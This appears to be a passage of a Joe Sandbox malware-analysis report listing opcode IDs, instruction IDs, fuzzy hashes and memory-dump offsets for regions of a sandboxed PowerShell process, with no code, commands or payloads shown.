                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4ed5fafc57dd7ca5c0b459d0741b6086ba86a20a98fc28152f9157371d5c4030
                                                                                                                                                                                                                                • Instruction ID: ee9b0eb54e51f821f4bbc23f81b778c8e275c88a18081ffbeacedb92413068fe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ed5fafc57dd7ca5c0b459d0741b6086ba86a20a98fc28152f9157371d5c4030
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB318D74A006059FCB14DF69E594BDEBBF2FF48308F108529E415AB7A4DB34AD49CBA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1813a6ba95300d16c8789ce981b32a141138adf70073909ccf1554afa9b0409c
                                                                                                                                                                                                                                • Instruction ID: efa7e9059e06dc36922169718f76392acd892a9d50954d92675c2b58449d5e23
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1813a6ba95300d16c8789ce981b32a141138adf70073909ccf1554afa9b0409c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3312B747002058FDB14DF68DA94AAABBF6EF88304B1484A9E449CF729EB34DD01CB90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 9bf2a6d3eff44e6b3817901c5ec985173d38f01102dce4068365f926fc88a6f2
                                                                                                                                                                                                                                • Instruction ID: 9424d93423d03bfd1a1738075c477271732087d23f52011c0163f83be6055e35
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bf2a6d3eff44e6b3817901c5ec985173d38f01102dce4068365f926fc88a6f2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A314A74E002099FDB44EFA9D495BEEBBF6AF89354F148069E405EB364EA348C41CB61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: f14a43634f65d8485e924a42dc5c0158684923fc03889eea7f80ae6c8c3cb52e
                                                                                                                                                                                                                                • Instruction ID: 45f6a43bb7072c6a4a2f275ff8e5ea332d230baff12d822ebca2304ff08bb569
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f14a43634f65d8485e924a42dc5c0158684923fc03889eea7f80ae6c8c3cb52e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56317E74A006059FCB14DF69E554BDEBBF2FF48308F108529D415AB7A4DB34AD49CB90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: cbc6e0a9a6c44580cab2b2ec489fae764172d18b511b467ed404673b1a563f89
                                                                                                                                                                                                                                • Instruction ID: f731f9a8cbee48d8b054487fd3f5420d84c1f8f30bd4e8a317a89ea2af8493d4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbc6e0a9a6c44580cab2b2ec489fae764172d18b511b467ed404673b1a563f89
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA314175A002148FCB14DF69E454ADEBBF6BF8C314F148569E406EB3A0DB359C45CB90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 353f58827657e552b52e108f4477f4f0bb7177d40a3d54406d42cc6145ea7011
                                                                                                                                                                                                                                • Instruction ID: 79c2f3e6df8555ac025acda3dba61641d87758089a24a0f94afd3e1e20ef42fb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 353f58827657e552b52e108f4477f4f0bb7177d40a3d54406d42cc6145ea7011
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C3152B8E002059FDB04EB64D858BAEB7B6FFC4300F1584B9D115AF3A4DA399D41CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 933ba2b86d822bcb06e1e705d0e493cd7b68dccd318e2fa8be055ebe257e9777
                                                                                                                                                                                                                                • Instruction ID: 678c0692baf26d4e553237406cc3a3ae024d5e1d49f84ae6e34031dce0131934
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 933ba2b86d822bcb06e1e705d0e493cd7b68dccd318e2fa8be055ebe257e9777
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F3198759013048EDB60CF6AD0887CAFBF2EF89324F28C46ADA6D9B215D7746481CB51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0901bd635ebc973ebcc5d87412a5bd5280e23c65f6c34ea6298c66e587d695f4
                                                                                                                                                                                                                                • Instruction ID: c9329a5d1fd528ddf71db9c62a541a5f2023213013fb192cff7e8c26c8097d5a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0901bd635ebc973ebcc5d87412a5bd5280e23c65f6c34ea6298c66e587d695f4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE310C75A002158FCB14EF69E458A9EBBF6FF8C314F148569E406EB3A0DB71AC45CB90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5c994a7064da88a3624ec872257c204751937a8140ad0d00c42bf9f6e5414feb
                                                                                                                                                                                                                                • Instruction ID: d883920d0ad8180f3d85a6d9137edf0a160558f09eb9f71f77459448a0107d16
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c994a7064da88a3624ec872257c204751937a8140ad0d00c42bf9f6e5414feb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E312FB8E002099FDB04EFA4D858AAEB7B6FFC4301F118469D215AB3A4DB359D458B91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2602242650.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7cc0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8df7dac244c35d76547cfb255c2f2ba9e66884edd57a46f3614730722b7592a3
                                                                                                                                                                                                                                • Instruction ID: 8537d314ca491a89bbfb016ea23e7f20544bbe065e201537c1169f9e4ba580c4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8df7dac244c35d76547cfb255c2f2ba9e66884edd57a46f3614730722b7592a3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6021B0B5A00206DFDF20CF6AC5C6B65B7E5FB45361F04806EE9088B250D738EA84CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2593579252.000000000356D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0356D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_356d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 07acf950a5112b3f7f08f045679d0a7d3b614d192960b8153f06472901104b3a
                                                                                                                                                                                                                                • Instruction ID: 8466c20b0cfbf5da726ac9e7b5d537efc3de5725c8614a140545cb7e2e475be9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07acf950a5112b3f7f08f045679d0a7d3b614d192960b8153f06472901104b3a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3021F471A08200EFCB05DF14F9C0B26BF65FB88314F24C5A9E9094B666C736D456CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2593579252.000000000356D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0356D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_356d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5b873bf2e8d9e1302ee08453968160fec9076101f25575b02eea1434200f6373
                                                                                                                                                                                                                                • Instruction ID: b4849422fb8e1d19e4c91d1ceee945a2714cf4c7e0cc9577a1ef975b5e5f72c4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b873bf2e8d9e1302ee08453968160fec9076101f25575b02eea1434200f6373
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8210475904640DFCB14DF24F9C4B26BFA5FB88324F24CAADD90A4B266C73AD446CB61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 18f278301735ac447dcf5838ca2d5ca47c64ca22cd80afced6dfa5fc7e5be4ae
                                                                                                                                                                                                                                • Instruction ID: a360c5231efcfbf20f0503cdce631b6d5fa339f60eb7af25e2f27f833e2965ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18f278301735ac447dcf5838ca2d5ca47c64ca22cd80afced6dfa5fc7e5be4ae
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C2188B49013048FDB60CF6AD0887CAFBF6EF89310F28C06ADA6D9B245D7746481CB61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a473029e692b21849263602a3f71b49ffe7f2ba118c78862b2d61f344721c615
                                                                                                                                                                                                                                • Instruction ID: b0d10d5f5f5266c031e4a63bbb037007ce2fc5bfc06bc832a2637218d4a606c6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a473029e692b21849263602a3f71b49ffe7f2ba118c78862b2d61f344721c615
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01112B3A7002188FCB04DBA8E950ADE77F6FFCC265B0440A9E509EB364DB35DC058B90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a123a485f96bed831e6dc4112e4eda12992e9e3c8e8757a094ffc1effee6282e
                                                                                                                                                                                                                                • Instruction ID: 925de390f8c88dfb1aaf0abd043d86cec320f92fdec2f4c661d787bd88038e2f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a123a485f96bed831e6dc4112e4eda12992e9e3c8e8757a094ffc1effee6282e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C91159718053498FDB10CFAAD9047DEFFF4AF49220F28805AD488A7651D739A585CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2602242650.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7cc0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1ee4dabd6589b07b504a7f18d6b88b332eb4d8c7b9c916783ba06d5085723870
                                                                                                                                                                                                                                • Instruction ID: b9074af5738517138bd331e745fb138e20d718899a8b0d3982cfeb115edc4673
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ee4dabd6589b07b504a7f18d6b88b332eb4d8c7b9c916783ba06d5085723870
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 181194B1A10306DFCB20CF59C5C4B66FBF5FB85221F0880AED5098B211D731DA41CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2593579252.000000000356D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0356D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_356d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                                                                • Instruction ID: 462e9c23c0bdadb6f675b497b9a3ee17939454029d10dfabd76ea515105bbd93
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A219D76904240DFCF06CF14E9C4B16BF72FB88314F28C5A9D9494B666C33AD46ACB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: cab7c53361a2bb62b10cc32fd584ab0306bf8886469d3e988c43ff97ca28decd
                                                                                                                                                                                                                                • Instruction ID: 8049f2891e67c0ec9bb81c698fdf8f55f4b6e5f77a7388e914bd16fe2a362de7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cab7c53361a2bb62b10cc32fd584ab0306bf8886469d3e988c43ff97ca28decd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D11D774A002199FCB04DF98D584AAEFBF5FF89310B148599D919AB361C731ED41CFA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2593579252.000000000356D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0356D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_356d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                                                                                • Instruction ID: b21578fc8006f7d1e7c6f8a35866a9f04e4429ec8b89cde2b4685cd839ccc65f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B119D79904680DFDB15CF14E5C4B15FFA1FB84328F28C6AAD84A4B666C33AD44ACB61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 451292bcd5e399f2902ed75c31e308deda75d9ae402701f9944ba5414fd4bd84
                                                                                                                                                                                                                                • Instruction ID: a25f4b5e40c1c2106a304d89eadcd4273b72d755b24d983e823e05a3c9c89012
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 451292bcd5e399f2902ed75c31e308deda75d9ae402701f9944ba5414fd4bd84
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 911155B1900209CFDB10CF9AD504BDEFBF4EB48320F28806AD548A7641D339A940CBA5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4ff46fc3636024005b014ef04fa73e699cbbe438cdbcc7cfe95671e4a75a2fc1
                                                                                                                                                                                                                                • Instruction ID: 6c0881d0419c5036ae51b0810240ec1bce195e0c8f021f40043df384bb1ade6d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ff46fc3636024005b014ef04fa73e699cbbe438cdbcc7cfe95671e4a75a2fc1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C01D2316083449FC718CB79D494AAA7FF4EF45250B1888EEE08ACB6B2CB34EC45CB00
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ca4236d150213f92d4d6291f71f1c4d5be64e5a46922011b74e583ac9b99a90a
                                                                                                                                                                                                                                • Instruction ID: fe4a04da1604c142b5e6540f0c3766aed7cf650cbcb520fa60f5dd1050ce3339
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca4236d150213f92d4d6291f71f1c4d5be64e5a46922011b74e583ac9b99a90a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB017135B01214DFCB119F74E818AAEBBF5FB88319F144079E91AD3351DB369911CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4ec870ee150ad44c03eb91233b951dd314d63682ae52febfad5ee749df807628
                                                                                                                                                                                                                                • Instruction ID: 61492bbbf2196568423be7dfdcd098230c83e49e91a090f25c78f082d135ea3a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ec870ee150ad44c03eb91233b951dd314d63682ae52febfad5ee749df807628
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3411D434A05109AFDB05DBA8D584B9DFBB2AF88314F29C159E404AB366C775ED86CB80
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 378c587c1a68dda746b9493de23df4612c976fa300cd6d9fa197466984793622
                                                                                                                                                                                                                                • Instruction ID: fa82d52cc7ed4c54c977cc21576c01b05cf12c16ad112a5ab9822b2ee6c3dfef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 378c587c1a68dda746b9493de23df4612c976fa300cd6d9fa197466984793622
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7911F371D0478A9FCB01CFA4D8556EDBFB4BF9A304F10061AE011ABA91EBB06596CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2593579252.000000000356D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0356D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_356d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bb76f4246ad2e85f20931ea0744c0f0d8b1e5d2287873823c09a5865bbc4ede8
                                                                                                                                                                                                                                • Instruction ID: d5338128ae49dc0fb9294334b3d8b4135922ce9140ee8fa111630015339aed8d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb76f4246ad2e85f20931ea0744c0f0d8b1e5d2287873823c09a5865bbc4ede8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8801D4312087409AE710CA26D984767BFE8FF41334F1CC96AED084B156D2799885C6B1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2593579252.000000000356D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0356D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_356d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 86e91bd123944b11bef814d1942a1b783b952b10d7fb143c18a1e1568d6d80ae
                                                                                                                                                                                                                                • Instruction ID: ac1ae2b7c83a0123d50849912bb6c08aaabf2efb101dddfc0365b4eca8e9f17d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86e91bd123944b11bef814d1942a1b783b952b10d7fb143c18a1e1568d6d80ae
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80012D7110E3C09ED7128B25D894B52BFB8EF43224F1D84CBD9888F1A7D2699849C772
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 6e8a30151e3f80058ef67444eaede53482b2bf3d5caa0f097b87a1ede64ee56e
                                                                                                                                                                                                                                • Instruction ID: de44528d0f7417ee31e52714db185a155f54707d253e2665fb75199c8c0ebc66
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e8a30151e3f80058ef67444eaede53482b2bf3d5caa0f097b87a1ede64ee56e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73F0C2756056449FC7158B69A844AAFBBF9EFC9220B00066FE04EC7762DE345C468770
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0a07fd1f23c8ddf45cd956bb9cdcece6487a365bc1a8dcf5f4c3ad1e84a43007
                                                                                                                                                                                                                                • Instruction ID: c1322e8acecfdc2c02539dc6c9e1a707345cfa258cf82a72c6c983f8203d8689
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a07fd1f23c8ddf45cd956bb9cdcece6487a365bc1a8dcf5f4c3ad1e84a43007
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E012632B05144ABCB15DB78E8059EDBFB1DFC8220F0884BAE805D7351DE719C42CBA1
                                                                                                                                                                                                                                Memory Dump Source
